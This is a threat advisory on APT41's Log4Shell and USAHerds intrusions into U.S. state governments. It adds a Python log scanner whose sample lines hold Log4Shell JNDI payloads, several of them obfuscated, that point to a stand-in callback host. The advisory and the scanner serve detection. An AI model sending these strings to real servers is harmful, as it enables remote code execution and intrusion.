Chinese state-sponsored threat group APT41 targets U.S. critical organizations using two Zero-Days

Threat Level – Amber | Vulnerability Report

For a detailed advisory, download the PDF file here

A Chinese state-sponsored threat group known as APT41 has been observed compromising the networks of at least six U.S. state governments in a campaign beginning in May 2021. APT41 is a well-known Chinese state-sponsored espionage group that targets organizations in both the public and private sectors and also conducts financially motivated operations for personal gain.

The group exploited two zero-day vulnerabilities: one in the USAHerds application (CVE-2021-44207) and the now well-known Log4j flaw, Log4Shell (CVE-2021-44228). After exploiting Log4Shell, the actor deployed a new iteration of a modular C++ backdoor known as KEYPLUG on Linux systems. The attacks also used an in-memory dropper dubbed StealthVector, which is used to execute the next-stage payload, alongside sophisticated post-compromise tools such as DEADEYE. During the espionage operation, the adversaries stole personally identifiable information from the compromised organizations.
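Because Log4Shell (CVE-2021-44228) fires on any attacker-controlled string that reaches a vulnerable logger, a practical first detection is to normalize web-server request logs and flag JNDI lookups. The following is an added example and not HivePro's code; the log lines and IP addresses are constructed, and the normalization handles the URL-encoded, case-lookup and default-value obfuscations that defeat naive substring matching.

```python
import re
from urllib.parse import unquote
from typing import List, Dict

# Constructed Apache-style access-log lines (sample data, not from the advisory).
# Line 1 is benign; lines 2-5 carry a JNDI lookup in plain, nested-lookup,
# empty-default and URL-encoded form respectively.
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:02:11 +0000] "GET /?q=${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.9 - - [15/Dec/2021:10:03:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:rmi://198.51.100.7/c}"',
    '10.0.0.9 - - [15/Dec/2021:10:04:00 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fd%7D"',
]

CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}")     # ${lower:j} -> j
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")         # ${name:-x} -> x
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)
CLIENT_IP = re.compile(r"^(\S+)")


def normalize(text: str) -> str:
    """Undo URL encoding and collapse innermost Log4j lookups until stable."""
    for _ in range(20):  # bounded so a crafted input cannot loop forever
        new = unquote(text)
        new = CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(), new)
        new = DEFAULT_LOOKUP.sub(r"\1", new)
        if new == text:
            return new
        text = new
    return text


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line that contains a JNDI lookup after normalization."""
    hits = []
    for idx, line in enumerate(lines, start=1):
        decoded = normalize(line)
        m = JNDI.search(decoded)
        if m:
            hits.append({"line": idx, "client": CLIENT_IP.match(line).group(1),
                         "scheme": m.group(1).lower(), "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(f"line {hit['line']}: client {hit['client']} scheme {hit['scheme']}")
```

Matching on the normalized string rather than the raw line is what catches lines 3 to 5; a hit is a reason to pull the host's process and outbound-connection telemetry for the minutes that follow, since the LDAP, RMI or DNS scheme names the callback the payload would attempt.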

The MITRE ATT&CK TTPs commonly used by APT41 are:

Tactics:

TA0001: Initial Access
TA0007: Discovery
TA0040: Impact
TA0009: Collection
TA0005: Defense Evasion
TA0003: Persistence
TA0011: Command and Control
TA0042: Resource Development
TA0002: Execution
TA0008: Lateral Movement
TA0006: Credential Access
TA0029: Privilege Escalation

Techniques:

T1071.001: Application Layer Protocol: Web Protocols
T1071.002: Application Layer Protocol: File Transfer Protocols
T1071.004: Application Layer Protocol: DNS
T1560.001: Archive Collected Data: Archive via Utility
T1197: BITS Jobs
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1110.002: Brute Force: Password Cracking
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1059.004: Command and Scripting Interpreter: Unix Shell
T1136.001: Create Account: Local Account
T1543.003: Create or Modify System Process: Windows Service
T1486: Data Encrypted for Impact
T1005: Data from Local System
T1568.002: Dynamic Resolution: Domain Generation Algorithms
T1546.008: Event Triggered Execution: Accessibility Features
T1480.001: Execution Guardrails: Environmental Keying
T1190: Exploit Public-Facing Application
T1203: Exploitation for Client Execution
T1133: External Remote Services
T1083: File and Directory Discovery
T1574.001: Hijack Execution Flow: DLL Search Order Hijacking
T1574.002: Hijack Execution Flow: DLL Side-Loading
T1574.006: Hijack Execution Flow: Dynamic Linker Hijacking
T1070.001: Indicator Removal on Host: Clear Windows Event Logs
T1070.003: Indicator Removal on Host: Clear Command History
T1070.004: Indicator Removal on Host: File Deletion
T1105: Ingress Tool Transfer
T1056.001: Input Capture: Keylogging
T1036.004: Masquerading: Masquerade Task or Service
T1036.005: Masquerading: Match Legitimate Name or Location
T1112: Modify Registry
T1104: Multi-Stage Channels
T1046: Network Service Scanning
T1135: Network Share Discovery
T1027: Obfuscated Files or Information
T1588.002: Obtain Capabilities: Tool
T1003.001: OS Credential Dumping: LSASS Memory
T1566.001: Phishing: Spearphishing Attachment
T1542.003: Pre-OS Boot: Bootkit
T1055: Process Injection
T1090: Proxy
T1021.001: Remote Services: Remote Desktop Protocol
T1021.002: Remote Services: SMB/Windows Admin Shares
T1496: Resource Hijacking
T1014: Rootkit
T1053.005: Scheduled Task/Job: Scheduled Task
T1218.001: Signed Binary Proxy Execution: Compiled HTML File
T1218.011: Signed Binary Proxy Execution: Rundll32
T1553.002: Subvert Trust Controls: Code Signing
T1195.002: Supply Chain Compromise: Compromise Software Supply Chain
T1016: System Network Configuration Discovery
T1049: System Network Connections Discovery
T1033: System Owner/User Discovery
T1569.002: System Services: Service Execution
T1078: Valid Accounts
T1102.001: Web Service: Dead Drop Resolver
T1047: Windows Management Instrumentation

Actor Details

Vulnerability Detail

Indicators of Compromise (IoCs)

Patch Link
